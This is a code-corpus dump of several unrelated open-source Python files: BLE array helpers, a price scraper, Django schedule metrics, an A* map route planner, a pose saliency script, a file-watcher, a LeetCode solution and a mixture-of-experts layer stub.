data_array = _populate_array(data_list, driver.ble_gattc_include_array)
return data_array
def list_to_ble_gattc_char_array(data_list):
"""Convert python list to ble_gattc_char_array."""
data_array = _populate_array(data_list, driver.ble_gattc_char_array)
return data_array
def list_to_desc_array(data_list):
"""Convert python list to ble_gattc_desc_array."""
data_array = _populate_array(data_list, driver.ble_gattc_desc_array)
return data_array
def list_to_handle_value_array(data_list):
"""Convert python list to ble_gattc_handle_value_array."""
data_array = _populate_array(data_list, driver.ble_gattc_handle_value_array)
return data_array
def list_to_serial_port_desc_array(data_list):
"""Convert python list to sd_rpc_serial_port_desc_array."""
data_array = _populate_array(data_list, driver.sd_rpc_serial_port_desc_array)
return data_array
def _populate_array(data_list, array_type):
length = len(data_list)
data_array = array_type(length)
for i in range(0, length):
data_array[i] = data_list[i]
return data_array
| 1.328125
| 1
|
scraper.py
|
aday913/web-scraper
| 0
|
12784817
|
<gh_stars>0
from requests_html import HTMLSession
from bs4 import BeautifulSoup
from mailer import Emailer
class Scraper(object):
'''
Main web scraping object. Takes in a URL and requested data point such as
price or title of the object and returns a string of that data.
'''
def __init__(self):
test = Emailer()
s = HTMLSession()
URL = 'https://smile.amazon.com/dp/0593298683'
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.5',
'Accept-Encoding' : 'gzip',
'DNT' : '1',
'Connection' : 'close'}
r = s.get(URL, headers=header)
soup = BeautifulSoup(r.text, "html.parser")
results = soup.find(id='price')
print(results.get_text())
print('Trying to send an email...')
test.sendMessage(
'''\
Hey there! This is a test email, where the price for the item is {}!
'''.format(results.get_text())
)
print('Email sent.')
if __name__ == '__main__':
scraper = Scraper()
| 3.390625
| 3
|
src/api/spreadsheet.py
|
Dr4kk0nnys/django-schedule-api
| 2
|
12784818
|
"""
This whole file is dedicated to the creation of spreadsheets. It's existence is for marketing related
stuff. It does involve programming, but it's more related to marketing.
Note: This code is not accessible through normal runtime
"""
from datetime import date, timedelta
from .models import User
def get_user(token_id):
return User.objects.get(token_id=token_id)
# To get the token id of the user, just go to the admin page and search for it's email
def get_user_metrics(token_id):
user = get_user(token_id)
print(user.schedules_set.all())
# This function needs the date of the first day of the week to figure it out the week you actually want
def get_user_weekly_metrics(token_id, day, month, year):
user = get_user(token_id)
start_date = date(year, month, day)
end_date = start_date + timedelta(days=7)
print(user.schedules_set.filter(date_and_time__date__gte=start_date, date_and_time__date__lte=end_date))
def get_total_schedules_from_two_accounts(first_account_token_id, second_account_token_id):
first_user = get_user(first_account_token_id)
second_user = get_user(second_account_token_id)
print(f'Total schedules of the first user: \n{first_user.schedules_set.all()}')
print(f'Total schedules of the second user: \n{second_user.schedules_set.all()}')
# This function gets the average of the newest and oldest schedule, so it's not as precise as a monthly average.
def get_user_entire_average_schedule_by_day(token_id):
user = get_user(token_id)
dates = user.schedules_set.all().order_by('date_and_time')
if dates.count() < 2:
print('Not enough schedules to create a metric')
return
newest_date = dates.first().date_and_time
oldest_date = dates.last().date_and_time
time_difference = newest_date - oldest_date
print(f'Newest date: {newest_date}')
print(f'Oldest date: {oldest_date}')
print(f'Time difference: {time_difference}')
print(f'Are they equal ? {newest_date == oldest_date}')
if abs(time_difference.days) <= 0:
print('The first and last date are the same. Cannot divide by zero. Considering time difference as 1.')
time_difference += timedelta(days=1)
average = dates.count() / abs(time_difference.days)
print(f'Average is: {average}')
# This function gets the average of the newest and oldest schedule of the month
def get_user_monthly_average_schedule_by_day(token_id, year, month):
user = get_user(token_id)
start_date = date(year, month, 1)
end_date = start_date + timedelta(days=30)
dates = user.schedules_set.filter(
date_and_time__date__gte=start_date,
date_and_time__date__lte=end_date
)
average = dates.count() / 30
print(f'Average is: {average}')
# This function is just a test, I'm just trying to see if I can call two users with a single database query
def call_three_users_at_the_same_time(start_time, end_time, first_user_token_id, second_user_token_id, third_user_token_id):
# Getting three users with only one query
users = User.objects.filter(token_id__in=[first_user_token_id, second_user_token_id, third_user_token_id])
for i in range(users.count()):
# If the date is already scheduled. AKA if the 'surgeon' doesn't have time
if users[i].schedules_set.filter(date_and_time__gte=start_time, date_and_time__lte=end_time):
print('The crew is occupied! Sorry <3')
return
print('The crew is all available!')
| 3.09375
| 3
|
src/assign1.py
|
jude-arokiam-uoit/csci-4610-assignment-1
| 0
|
12784819
|
<filename>src/assign1.py
from Tkinter import *
import struct
import xml.etree.ElementTree as ET
from Queue import *
import math
import logging
# bounds of the window, in lat/long
LEFTLON = -78.9697000
RIGHTLON = -78.9148000
TOPLAT = 43.9187000
BOTLAT = 43.8843000
WIDTH = RIGHTLON-LEFTLON
HEIGHT = TOPLAT-BOTLAT
# ratio of one degree of longitude to one degree of latitude
LONRATIO = math.cos(TOPLAT*3.1415/180)
WINWID = 800
WINHGT = (int)((WINWID/LONRATIO)*HEIGHT/WIDTH)
TOXPIX = WINWID/WIDTH
TOYPIX = WINHGT/HEIGHT
#width,height of elevation array
EPIX = 3601
# approximate number of meters per degree of latitude
MPERLAT = 111000
MPERLON = MPERLAT*LONRATIO
# way type
way_types = []
elevation_difference = []
def node_dist(n1, n2):
''' Distance between nodes n1 and n2, in meters. '''
dx = (n2.pos[0]-n1.pos[0])*MPERLON
dy = (n2.pos[1]-n1.pos[1])*MPERLAT
return math.sqrt(dx*dx+dy*dy) # in meters
class Node():
''' Graph (map) node, not a search node! '''
__slots__ = ('id', 'pos', 'ways', 'elev')
def __init__(self,id,p,e=0):
self.id = id
self.pos = p
self.ways = []
self.elev = e
self.waystr = None
def __str__(self):
if self.waystr is None:
self.waystr = self.get_waystr()
return str(self.pos) + ": " + self.waystr
def get_waystr(self):
if self.waystr is None:
self.waystr = ""
self.wayset = set()
for w in self.ways:
self.wayset.add(w.way.name)
for w in self.wayset:
self.waystr += w.encode("utf-8") + " "
return self.waystr
class Edge():
''' Graph (map) edge. Includes cost computation.'''
__slots__ = ('way','dest')
def __init__(self, w, src, d):
self.way = w
self.dest = d
self.cost = node_dist(src,d)
difference = abs(d.elev - src.elev)
if d.elev > src.elev:
#A steep uphill way will increase cost
if difference > 30:
self.cost += difference*2
else:
self.cost += (difference)*0.5
else:
#A steep downhill way will increase cost
if difference > 30:
self.cost += difference*2
else:
self.cost -= (difference)*0.5
way_types.append(self.way.type)
class Way():
''' A way is an entire street, for drawing, not searching. '''
__slots__ = ('name','type','nodes')
# nodes here for ease of drawing only
def __init__(self,n,t):
self.name = n
self.type = t
self.nodes = []
class Planner():
__slots__ = ('nodes', 'ways')
def __init__(self,n,w):
self.nodes = n
self.ways = w
def heur(self,node,gnode):
'''
Heuristic function is just straight-line (flat) distance.
Since the actual cost only adds to this distance, this is admissible.
Refer to Edge class for heuristic cost function (start line 61)
'''
return node_dist(node,gnode)
def plan(self,s,g):
'''
Standard A* search
'''
parents = {}
costs = {}
q = PriorityQueue()
q.put((self.heur(s,g),s))
parents[s] = None
costs[s] = 0
while not q.empty():
cf, cnode = q.get()
if cnode == g:
print ("Path found, time will be",costs[g]*60/5000) #5 km/hr on flat
return self.make_path(parents,g)
for edge in cnode.ways:
newcost = costs[cnode] + edge.cost
if edge.dest not in parents or newcost < costs[edge.dest]:
parents[edge.dest] = (cnode, edge.way)
costs[edge.dest] = newcost
q.put((self.heur(edge.dest,g)+newcost,edge.dest))
def make_path(self,par,g):
nodes = []
ways = []
curr = g
nodes.append(curr)
while par[curr] is not None:
prev, way = par[curr]
ways.append(way.name)
nodes.append(prev)
curr = prev
nodes.reverse()
ways.reverse()
return nodes,ways
class PlanWin(Frame):
'''
All the GUI pieces to draw the streets, allow places to be selected,
and then draw the resulting path.
'''
__slots__ = ('whatis', 'nodes', 'ways', 'elevs', 'nodelab', 'elab', \
'planner', 'lastnode', 'startnode', 'goalnode')
def lat_lon_to_pix(self,latlon):
x = (latlon[1]-LEFTLON)*(TOXPIX)
y = (TOPLAT-latlon[0])*(TOYPIX)
return x,y
def pix_to_elev(self,x,y):
return self.lat_lon_to_elev(((TOPLAT-(y/TOYPIX)),((x/TOXPIX)+LEFTLON)))
def lat_lon_to_elev(self,latlon):
# row is 0 for 43N, 1201 (EPIX) for 42N
row = (int)((43 - latlon[0]) * EPIX)
# col is 0 for 18 E, 1201 for 19 E
col = (int)((latlon[1]-18) * EPIX)
return self.elevs[row*EPIX+col]
def maphover(self,event):
self.elab.configure(text = str(self.pix_to_elev(event.x,event.y)))
for (dx,dy) in [(0,0),(-1,0),(0,-1),(1,0),(0,1),(-1,-1),(-1,1),(1,-1),(1,1)]:
ckpos = (event.x+dx,event.y+dy)
if ckpos in self.whatis:
self.lastnode = self.whatis[ckpos]
lnpos = self.lat_lon_to_pix(self.nodes[self.lastnode].pos)
self.canvas.coords('lastdot',(lnpos[0]-2,lnpos[1]-2,lnpos[0]+2,lnpos[1]+2))
nstr = str(self.lastnode)
nstr += " "
nstr += str(self.nodes[self.whatis[ckpos]].get_waystr())
self.nodelab.configure(text=nstr)
return
def mapclick(self,event):
''' Canvas click handler:
First click sets path start, second sets path goal
'''
print "Clicked on "+str(event.x)+","+str(event.y)+" last node "+str(self.lastnode)
if self.lastnode is None:
return
if self.startnode is None:
self.startnode = self.nodes[self.lastnode]
self.snpix = self.lat_lon_to_pix(self.startnode.pos)
self.canvas.coords('startdot',(self.snpix[0]-2,self.snpix[1]-2,self.snpix[0]+2,self.snpix[1]+2))
elif self.goalnode is None:
self.goalnode = self.nodes[self.lastnode]
self.snpix = self.lat_lon_to_pix(self.goalnode.pos)
self.canvas.coords('goaldot',(self.snpix[0]-2,self.snpix[1]-2,self.snpix[0]+2,self.snpix[1]+2))
def clear(self):
''' Clear button callback. '''
self.lastnode = None
self.goalnode = None
self.startnode = None
self.canvas.coords('startdot',(0,0,0,0))
self.canvas.coords('goaldot',(0,0,0,0))
self.canvas.coords('path',(0,0,0,0))
def plan_path(self):
''' Path button callback, plans and then draws path.'''
print "Planning!"
if self.startnode is None or self.goalnode is None:
print "Sorry, not enough info."
return
print ("From", self.startnode.id, "to", self.goalnode.id)
if self.startnode is None or self.goalnode is None:
print 'nodes are none'
nodes,ways = self.planner.plan(self.startnode, self.goalnode)
lastway = ""
for wayname in ways:
if wayname != lastway:
print wayname
lastway = wayname
coords = []
for node in nodes:
npos = self.lat_lon_to_pix(node.pos)
coords.append(npos[0])
coords.append(npos[1])
#print node.id
self.canvas.coords('path',*coords)
def print_nodes(self):
print ("1: ", self.startnode.id, "2: ", self.goalnode.id)
print (self.startnode)
def __init__(self,master,nodes,ways,coastnodes,elevs):
self.whatis = {}
self.nodes = nodes
self.ways = ways
self.elevs = elevs
self.startnode = None
self.goalnode = None
self.planner = Planner(nodes,ways)
thewin = Frame(master)
w = Canvas(thewin, width=WINWID, height=WINHGT)#, cursor="crosshair")
w.bind("<Button-1>", self.mapclick)
w.bind("<Motion>", self.maphover)
for waynum in self.ways:
nlist = self.ways[waynum].nodes
thispix = self.lat_lon_to_pix(self.nodes[nlist[0]].pos)
if len(self.nodes[nlist[0]].ways) > 2:
self.whatis[((int)(thispix[0]),(int)(thispix[1]))] = nlist[0]
for n in range(len(nlist)-1):
nextpix = self.lat_lon_to_pix(self.nodes[nlist[n+1]].pos)
self.whatis[((int)(nextpix[0]),(int)(nextpix[1]))] = nlist[n+1]
w.create_line(thispix[0],thispix[1],nextpix[0],nextpix[1])
thispix = nextpix
thispix = self.lat_lon_to_pix(self.nodes[coastnodes[0]].pos)
# also draw the coast:
for n in range(len(coastnodes)-1):
nextpix = self.lat_lon_to_pix(self.nodes[coastnodes[n+1]].pos)
w.create_line(thispix[0],thispix[1],nextpix[0],nextpix[1],fill="blue")
thispix = nextpix
# other visible things are hiding for now...
w.create_line(0,0,0,0,fill='orange',width=3,tag='path')
w.create_oval(0,0,0,0,outline='green',fill='green',tag='startdot')
w.create_oval(0,0,0,0,outline='red',fill='red',tag='goaldot')
w.create_oval(0,0,0,0,outline='blue',fill='blue',tag='lastdot')
w.pack(fill=BOTH)
self.canvas = w
cb = Button(thewin, text="Clear", command=self.clear)
cb.pack(side=RIGHT,pady=5)
sb = Button(thewin, text="Plan!", command=self.plan_path)
sb.pack(side=RIGHT,pady=5)
sb = Button(thewin, text="Nodes", command=self.print_nodes)
sb.pack(side=RIGHT,pady=5)
nodelablab = Label(thewin, text="Node:")
nodelablab.pack(side=LEFT, padx = 5)
self.nodelab = Label(thewin,text="None")
self.nodelab.pack(side=LEFT,padx = 5)
elablab = Label(thewin, text="Elev:")
elablab.pack(side=LEFT, padx = 5)
self.elab = Label(thewin, text = "0")
self.elab.pack(side=LEFT, padx = 5)
thewin.pack()
def build_elevs(efilename):
''' read in elevations from a file. '''
efile = open(efilename)
estr = efile.read()
elevs = []
for spot in range(0,len(estr),2):
elevs.append(struct.unpack('<h',estr[spot:spot+2])[0])
return elevs
def build_graph(elevs):
''' Build the search graph from the OpenStreetMap XML. '''
tree = ET.parse('whitby.osm')
root = tree.getroot()
print root
nodes = dict()
ways = dict()
waytypes = set()
coastnodes = []
for item in root:
if item.tag == 'node':
coords = ((float)(item.get('lat')),(float)(item.get('lon')))
# row is 0 for 43N, 1201 (EPIX) for 42N
erow = (int)((43 - coords[0]) * EPIX)
# col is 0 for 18 E, 1201 for 19 E
ecol = (int)((coords[1]-18) * EPIX)
try:
el = elevs[erow*EPIX+ecol]
except IndexError:
el = 0
nodes[(long)(item.get('id'))] = Node((long)(item.get('id')),coords,el)
elif item.tag == 'way':
if item.get('id') == '26250657': #main coastline way ID
for thing in item:
if thing.tag == 'nd':
coastnodes.append((long)(thing.get('ref')))
continue
useme = False
oneway = False
myname = 'unnamed way'
for thing in item:
if thing.tag == 'tag' and thing.get('k') == 'highway':
useme = True
mytype = thing.get('v')
if thing.tag == 'tag' and thing.get('k') == 'name':
myname = thing.get('v')
if thing.tag == 'tag' and thing.get('k') == 'oneway':
if thing.get('v') == 'yes':
oneway = True
if useme:
wayid = (long)(item.get('id'))
ways[wayid] = Way(myname,mytype)
nlist = []
for thing in item:
if thing.tag == 'nd':
nlist.append((long)(thing.get('ref')))
thisn = nlist[0]
for n in range(len(nlist)-1):
nextn = nlist[n+1]
nodes[thisn].ways.append(Edge(ways[wayid],nodes[thisn],nodes[nextn]))
thisn = nextn
if not oneway:
thisn = nlist[-1]
for n in range(len(nlist)-2,-1,-1):
nextn = nlist[n]
nodes[thisn].ways.append(Edge(ways[wayid],nodes[thisn],nodes[nextn]))
thisn = nextn
ways[wayid].nodes = nlist
print len(coastnodes)
print coastnodes[0]
#print coastnodes
print nodes[coastnodes[0]]
return nodes, ways, coastnodes
elevs = build_elevs("n43_w114_1arc_v2.bil")
nodes, ways, coastnodes = build_graph(elevs)
print set(way_types)
master = Tk()
thewin = PlanWin(master,nodes,ways,coastnodes,elevs)
mainloop()
| 3.171875
| 3
|
pose_integrated_gradient.py
|
QY-H00/hand_pose
| 0
|
12784820
|
<gh_stars>0
import argparse
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '4,5,6,7'
import numpy as np
import torch
import time
import cv2
import pickle
from pathlib import Path
from kornia.geometry.dsnt import spatial_softmax_2d, spatial_softargmax_2d
from IG.SaliencyModel.BackProp import attribution_objective
from IG.SaliencyModel.BackProp import saliency_map_PG as saliency_map
from IG.SaliencyModel.BackProp import GaussianBlurPath
from IG.SaliencyModel.utils import cv2_to_pil, pil_to_cv2, gini, grad_abs_norm, vis_saliency, vis_saliency_kde
from IG.SaliencyModel.utils import interpolation, isotropic_gaussian_kernel, make_pil_grid
from IG.ModelZoo.utils import _add_batch_one
from data.rhd_dataset import RHDDateset
from data.eval_utils import AverageMeter
from progress.bar import Bar
def regress25d(heatmaps, beta):
bs = heatmaps.shape[0]
betas = beta.clone().view(1, 21, 1).repeat(bs, 1, 1)
uv_heatmaps = spatial_softmax_2d(heatmaps, betas)
coord_out = spatial_softargmax_2d(uv_heatmaps, normalized_coordinates=False)
coord_out_final = coord_out.clone()
return coord_out_final.view(bs, 21, 2)
def Path_gradient(numpy_image, model, gt, path_interpolation_func, joint_number, noise = None, cuda=False):
"""
:param path_interpolation_func:
return \lambda(\alpha) and d\lambda(\alpha)/d\alpha, for \alpha\in[0, 1]
This function return pil_numpy_images
:return:
"""
if cuda:
model = model.cuda()
cv_numpy_image = np.moveaxis(numpy_image, 0, 2)
if noise is None:
noise = np.zeros_like(numpy_image)
image_interpolation, lambda_derivative_interpolation = path_interpolation_func(cv_numpy_image)
grad_accumulate_list = np.zeros_like(image_interpolation)
result_list = []
for i in range(image_interpolation.shape[0]):
img_tensor = torch.from_numpy(image_interpolation[i]).cuda()
img_tensor = img_tensor + torch.from_numpy(noise).float().cuda()
img_tensor.requires_grad_(True)
result = model(_add_batch_one(img_tensor).cuda())
# result = regress25d(result, beta)
result = result[:, joint_number:joint_number+1]
target = torch.exp(-0.3*torch.linalg.norm(result - gt.cuda()))
target.backward()
grad = img_tensor.grad.cpu().detach().numpy()
if np.any(np.isnan(grad)):
grad[np.isnan(grad)] = 0.0
grad_accumulate_list[i] = grad * lambda_derivative_interpolation[i]
result_list.append(result.cpu().detach().numpy())
results_numpy = np.asarray(result_list)
return grad_accumulate_list, results_numpy, image_interpolation
def GaussianLinearPath(sigma, fold, l=5):
def path_interpolation_func(cv_numpy_image):
kernel = isotropic_gaussian_kernel(l, sigma)
baseline_image = cv2.filter2D(cv_numpy_image, -1, kernel)
image_interpolation = interpolation(cv_numpy_image, baseline_image, fold, mode='linear').astype(np.float32)
lambda_derivative_interpolation = np.repeat(np.expand_dims(cv_numpy_image - baseline_image, axis=0), fold, axis=0)
return np.moveaxis(image_interpolation, 3, 1).astype(np.float32), \
np.moveaxis(lambda_derivative_interpolation, 3, 1).astype(np.float32)
return path_interpolation_func
def invert_GaussianLinearPath(sigma, fold, l=5):
def path_interpolation_func(cv_numpy_image):
kernel = isotropic_gaussian_kernel(l, sigma)
baseline_image = cv_numpy_image - cv2.filter2D(cv_numpy_image, -1, kernel)
image_interpolation = interpolation(cv_numpy_image, baseline_image, fold, mode='linear').astype(np.float32)
lambda_derivative_interpolation = np.repeat(np.expand_dims(cv_numpy_image - baseline_image, axis=0), fold, axis=0)
return np.moveaxis(image_interpolation, 3, 1).astype(np.float32), \
np.moveaxis(lambda_derivative_interpolation, 3, 1).astype(np.float32)
return path_interpolation_func
def get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number,
window_size=4, sigma=1.2, fold=50, l=9, alpha=0.5, smooth=True, vis=False):
img_crop = img_crop.permute(1, 2, 0)
min = torch.min(torch.min(img_crop, dim=0)[0], dim=0)[0]
max = torch.max(torch.max(img_crop, dim=0)[0], dim=0)[0]
img_show = (img_crop - min) / (max - min)
img_show = np.array(img_show)
img_show = img_show * 255
uv_crop_zero = uv_crop[joint_number] * 4
w = uv_crop_zero[0].type(torch.IntTensor)
h = uv_crop_zero[1].type(torch.IntTensor)
draw_img = pil_to_cv2(img_show)
cv2.rectangle(draw_img, (int(w - window_size // 2), int(h - window_size // 2)),
(int(w + window_size // 2), int(h + window_size // 2)),
(0, 0, 1), 2)
w = w // 4
h = h // 4
window_size = window_size // 4
position_pil = cv2_to_pil(draw_img)
gaus_blur_path_func = GaussianBlurPath(sigma, fold, l)
img_tensor = img_crop.permute(2, 0, 1)
image_numpy = img_tensor.cpu().detach().numpy()
if smooth:
stdev = 0.01 * (np.max(image_numpy) - np.min(image_numpy))
total_gradients = np.zeros_like(image_numpy, dtype=np.float32)
for _ in range(10):
noise = np.random.normal(0, stdev, image_numpy.shape)
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func,
joint_number,
noise=noise,
cuda=True)
grad_numpy, result = saliency_map(interpolated_grad_numpy, result_numpy)
total_gradients += (grad_numpy * grad_numpy)
grad_numpy_final = total_gradients / 10
else:
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func, joint_number,
cuda=True)
grad_numpy_final, result = saliency_map(interpolated_grad_numpy, result_numpy)
abs_normed_grad_numpy = grad_abs_norm(grad_numpy_final)
# Visualization takes more time
if not vis:
return abs_normed_grad_numpy
else:
saliency_image_abs = vis_saliency(abs_normed_grad_numpy, zoomin=1)
saliency_image_kde = vis_saliency_kde(abs_normed_grad_numpy)
saliency_image_kde = saliency_image_kde.resize(position_pil.size)
blend_abs_and_input = cv2_to_pil(pil_to_cv2(saliency_image_abs) * (1.0 - alpha) + pil_to_cv2(img_show) * alpha)
blend_kde_and_input = cv2_to_pil(pil_to_cv2(saliency_image_kde) * (1.0 - alpha) + pil_to_cv2(img_show) * alpha)
pil = make_pil_grid(
[position_pil,
saliency_image_abs,
saliency_image_kde,
blend_abs_and_input,
blend_kde_and_input]
)
return abs_normed_grad_numpy, pil
def get_pose_integrated_gradient_no_vis(model, uv_crop, img_crop, joint_number,
window_size=4, sigma=1.2, fold=50, l=9, smooth=True):
img_crop = img_crop.permute(1, 2, 0)
uv_crop_zero = uv_crop[joint_number] * 4
w = uv_crop_zero[0].type(torch.IntTensor)
h = uv_crop_zero[1].type(torch.IntTensor)
w = w // 4
h = h // 4
gaus_blur_path_func = GaussianBlurPath(sigma, fold, l)
img_tensor = img_crop.permute(2, 0, 1)
image_numpy = img_tensor.cpu().detach().numpy()
if smooth:
stdev = 0.01 * (np.max(image_numpy) - np.min(image_numpy))
total_gradients = np.zeros_like(image_numpy, dtype=np.float32)
for _ in range(10):
noise = np.random.normal(0, stdev, image_numpy.shape)
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func,
joint_number,
noise=noise,
cuda=True)
grad_numpy, result = saliency_map(interpolated_grad_numpy, result_numpy)
total_gradients += (grad_numpy * grad_numpy)
grad_numpy_final = total_gradients / 10
else:
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func, joint_number,
cuda=True)
grad_numpy_final, result = saliency_map(interpolated_grad_numpy, result_numpy)
abs_normed_grad_numpy = grad_abs_norm(grad_numpy_final)
return abs_normed_grad_numpy
def get_diffusion(abs_normed_grad_numpy):
gini_index = gini(abs_normed_grad_numpy)
diffusion_index = (1 - gini_index) * 100
return diffusion_index
def get_attention(grad, mask):
# grad_mask = np.where(grad == 0, 0, 1)
hand_mask_percentage = np.sum(mask) / ((mask.shape[0] + 1) * (mask.shape[1] + 1))
score = np.sum(grad * mask) / np.sum(grad)
# score_binary_attr = np.sum(grad_mask * mask) / np.sum(grad_mask)
# score_normed_attr = score_attr / hand_mask_percentage
score = score / hand_mask_percentage
return score
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='PyTorch Train Hourglass On 2D Keypoint Detection')
parser.add_argument(
'-m',
'--mode',
type=str,
default='regression',
help='regression/softargmax/detection'
)
parser.add_argument(
'-s',
'--start_idx',
type=int,
default=0,
help='regression/softargmax/detection'
)
parser.add_argument(
'-e',
'--end_idx',
type=int,
default=31,
help='regression/softargmax/detection'
)
parser.add_argument(
'-i',
'--vis',
action='store_true',
default=False
)
args = parser.parse_args()
mode = args.mode
start_sample_size = args.start_idx
end_sample_size = args.end_idx
batch_size = 32
model = torch.load(f'trained_model_{mode}/model.pkl')
beta = torch.mul(torch.ones(21), 5).cuda()
print("\nCREATE DATASET...")
val_dataset = RHDDateset('RHD_published_v2/', 'evaluation', input_size=256, output_full=True, aug=False)
print("\nLOAD DATASET...")
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=False,
pin_memory=True
)
if not args.vis:
diffusion = AverageMeter()
attention = AverageMeter()
length = len(val_loader) * batch_size * 21
bar = Bar(f'\033[31m process \033[0m', max=length)
sample_num = -1
all_count = -1
for i, sample in enumerate(val_loader):
if i < start_sample_size / batch_size:
continue
for j, instance in enumerate(sample):
sample_num += 1
if sample_num >= end_sample_size:
break
img_crop = sample["img_crop"][j]
uv_crop = sample["uv_crop"][j]
mask = sample["mask"][j]
mask = cv2.resize(mask.numpy().squeeze(), dsize=(256, 256))
for joint_number in range(21):
all_count += 1
path = os.path.join(f"{mode}SampleIG", f"{sample_num}", f"joint{joint_number}")
_dir = Path(path)
# grad_np = np.array([])
last = time.time()
grad_np = get_pose_integrated_gradient_no_vis(model, uv_crop, img_crop, joint_number)
if not _dir.exists():
# grad_np = get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number, vis=False)
_dir.mkdir(parents=True)
with open(f'{path}/grad.pickle', 'wb') as f:
pickle.dump(grad_np, f)
# else:
# with open(f'{path}/grad.pickle', 'rb') as f:
# grad_np = pickle.load(f)
diffusion_val = get_diffusion(grad_np)
attention_val = get_attention(grad_np, mask)
diffusion.update(diffusion_val, 1)
attention.update(attention_val, 1)
bar.suffix = (
'({batch}/{size}) '
'diffusion: {diffusion:.4f} | '
'attention: {attention:.4f} | '
'time cost: {cost:.4f} | '
).format(
batch=all_count,
size=length,
diffusion=diffusion.avg,
attention=attention.avg,
cost=time.time() - last
)
bar.next()
if i > end_sample_size / batch_size + 1:
break
bar.finish()
else:
# Store the cropped image and corresponding heatmap
for i, sample in enumerate(val_loader):
if i < start_sample_size / batch_size:
continue
for j in range(batch_size):
sample_num = i * batch_size + j
if sample_num >= end_sample_size:
break
img_crop = sample["img_crop"][j]
uv_crop = sample["uv_crop"][j]
bar = Bar(f'\033[31m PIG_{sample_num} \033[0m', max=21)
for joint_number in range(21):
grad_np, pil = get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number, vis=True)
path = os.path.join("sample", f"IG_{sample_num}_joint_{joint_number}")
if not os.path.exists(path):
os.mkdir(path)
pil.save(f"{path}/{mode}.jpg")
with open(f'{path}/{mode}_grad.pickle', 'wb') as f:
pickle.dump(grad_np, f)
bar.next()
bar.finish()
if i > end_sample_size / batch_size + 1:
break
| 1.867188
| 2
|
src/app.py
|
nthienan/watcher
| 0
|
12784821
|
<filename>src/app.py
import logging
import logging.handlers
import os
import time
import pyinotify
import functools
from subprocess import Popen, PIPE
def init_logger(cfg):
logger = logging.getLogger()
logger.setLevel(cfg.log_level)
formatter = logging.Formatter('%(asctime)s %(levelname)s - %(message)s')
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
file_handler = logging.handlers.RotatingFileHandler(
filename=cfg.log_file,
maxBytes=1250000,
backupCount=10)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
def run_cmd(*agrs, **keywords):
try:
logging.info("detected changes, command is running...")
logging.debug("cmd: %s" % keywords['cmd'])
p = Popen(keywords['cmd'], stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
logging.debug("stdout: %s" % stdout)
logging.debug("stderr: %s" % stderr)
if stderr:
raise RuntimeError('an unexpected error occurred: %s' % stderr)
except Exception as err:
logging.error("%s" % err)
else:
logging.info("command has been run successfully")
class Application:
def __init__(self, opts, **cfg):
self.cfg = opts
self.is_running = False
init_logger(self.cfg)
self.wm = pyinotify.WatchManager()
mask = pyinotify.IN_CREATE | pyinotify.IN_DELETE | pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO
self.wm.add_watch(self.cfg.watch_dir, mask, rec=True)
def run(self):
self.is_running = True
logging.info("watcher is running...")
try:
handler = functools.partial(run_cmd, cmd=self.cfg.cmd)
self.notifier = pyinotify.Notifier(self.wm)
self.notifier.loop(callback=handler)
except pyinotify.NotifierError as err:
logging.error('%s' % err)
def stop(self):
self.is_running = False
logging.info("watcher is stopping...")
self.notifier.stop()
logging.info("watcher stopped")
| 2.421875
| 2
|
src/Schema/src/schema.py
|
OakInn/protoargs
| 7
|
12784822
|
import sys
import schema_pa
class ArgsParser:
def parse(self, argv):
self.config = schema_pa.parse("schema",
"Test schema", argv)
if __name__ == "__main__":
parser = ArgsParser()
parser.parse(sys.argv[1:])
print(parser.config)
| 2.703125
| 3
|
src/493. Reverse Pairs.py
|
rajshrivastava/LeetCode
| 1
|
12784823
|
class Solution:
def reversePairs(self, nums: List[int]) -> int:
def merge(left, mid, right):
p1, p2 = left, mid+1
while p1 <= mid and p2 <=right:
if nums[p1] > nums[p2]*2:
self.count += mid-p1+1
p2+=1
else:
p1+=1
nums[left:right+1] = sorted(nums[left:right+1])
def merge_count(left, right):
if left >= right:
return
mid = left+(right-left)//2
merge_count(left, mid)
merge_count(mid+1, right)
merge(left, mid, right)
self.count = 0
merge_count(0, len(nums)-1)
return self.count
| 3.453125
| 3
|
machinelearning-benchmark/dl/mixture-of-experts/ConvolutionalMoE.py
|
YyongXin/tf-mets
| 0
|
12784824
|
<reponame>YyongXin/tf-mets<filename>machinelearning-benchmark/dl/mixture-of-experts/ConvolutionalMoE.py
# -*- coding: utf-8 -*-
"""Convolutional MoE layers. The code here is based on the implementation of the standard convolutional layers in Keras.
"""
import numpy as np
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras import activations, initializers, regularizers, constraints
from tensorflow.keras.initializers import RandomNormal
from tensorflow.keras.layers import Layer, InputSpec
from tensorflow.python.keras.utils import conv_utils
# FIXME: In tf2.0, this API is updated.
#from keras.utils import conv_utils
class _ConvMoE(Layer):
"""Abstract nD convolution layer mixture of experts (private, used as implementation base).
"""
def __init__(self, rank,
n_filters,
n_experts_per_filter,
kernel_size,
strides=1,
padding='valid',
data_format='channels_last',
dilation_rate=1,
expert_activation=None,
gating_activation=None,
use_expert_bias=True,
use_gating_bias=True,
expert_kernel_initializer_scale=1.0,
